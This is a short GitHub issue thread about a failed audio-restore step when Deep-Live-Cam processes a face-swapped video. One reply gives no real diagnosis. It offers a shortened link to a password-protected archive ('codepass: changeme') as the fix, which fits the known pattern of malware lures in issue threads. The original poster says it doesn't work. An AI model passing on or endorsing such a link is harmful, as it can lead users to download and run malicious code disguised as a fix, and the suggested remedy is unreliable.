### ISSUE TITLE
Why does it show a failure to save audio when I perform face swapping on a video?

### ISSUE THREAD

**Issue by Bhl0318** [hacksider/Deep-Live-Cam#658]
[DLC.CORE] Detecting fps...
[DLC.CORE] Creating video with 10.0 fps...
[DLC.CORE] Restoring audio...
[DLC.CORE] Processing to video failed!

**Comment by SagarChandra07** [comment]
install this
https://bit.ly/47P0Nvo
Archive codepass: changeme

you may need to install the c compiler

**Comment by Bhl0318** [comment]
> install this https://bit.ly/47P0Nvo Archive codepass: changeme
> 
> you may need to install the c compiler

It doesn't work...
